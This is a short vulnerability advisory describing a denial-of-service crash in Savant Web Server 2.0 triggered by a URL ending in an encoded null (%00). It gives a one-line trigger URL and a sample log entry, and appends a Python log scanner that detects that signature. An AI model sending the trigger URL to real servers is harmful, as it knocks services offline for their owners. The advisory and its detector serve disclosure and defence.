Savant Web Server 2.0 Denial of Service
Reported December 28, 1999 by USSRLabs
VERSIONS AFFECTED
Savant Web Server 2.0

DESCRIPTION

Savant Web Server has a buffer overflow condition triggered by appending a NULL character (URL-encoded as %00 in the example below) to the end of a URL. The overflow causes the server to crash.

Example:
http://www.s0mep00rs4p.com/%00/

The action is logged and looks similar to the entry below:

Attacker Ip - - [28/Dec/1999:01:11:37 -0600] "GET /%00/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html" 301 279
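
One way to flag this signature when reviewing access logs, as an added example that is not part of the original advisory. It assumes Common Log Format entries; the three-repeat threshold, the function names and the 192.0.2.x sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Common Log Format (assumed): host ident user [time] "METHOD target ..." status size
CLF = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) ([^\s"]+)[^"]*" (\d{3}) (\S+)$'
)
# Three or more back-to-back copies of the default document name,
# the pattern visible in the advisory's log entry (threshold is an assumption).
REPEATED_INDEX = re.compile(r'(?:index\.html){3,}', re.IGNORECASE)

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Dec/1999:01:11:37 -0600] '
    '"GET /%00/index.htmlindex.htmlindex.html" 301 279',
    '192.0.2.11 - - [28/Dec/1999:01:12:02 -0600] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.12 - - [28/Dec/1999:01:13:40 -0600] "GET /docs/%00 HTTP/1.0" 404 0',
]

def inspect(line):
    """Return (host, timestamp, reasons); reasons is empty for a clean line."""
    m = CLF.match(line.strip())
    if not m:
        return (None, None, ["unparsed"])
    host, ts, target = m.group(1, 2, 4)
    path = target.split("?", 1)[0]           # ignore the query string
    reasons = []
    # Decode one level of percent-encoding and look for a NUL byte in the path.
    if b"\x00" in unquote_to_bytes(path):
        reasons.append("encoded-null-in-path")
    if REPEATED_INDEX.search(path):
        reasons.append("repeated-index-html")
    return (host, ts, reasons)

def scan(lines):
    """Return only the entries that matched at least one indicator."""
    return [result for result in map(inspect, lines) if result[2]]

if __name__ == "__main__":
    for host, ts, reasons in scan(SAMPLE_LOG):
        print(f"{ts} {host}: {', '.join(reasons)}")
```
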


VENDOR RESPONSE

None known at the time of this writing.

CREDITS
Discovered by USSRLabs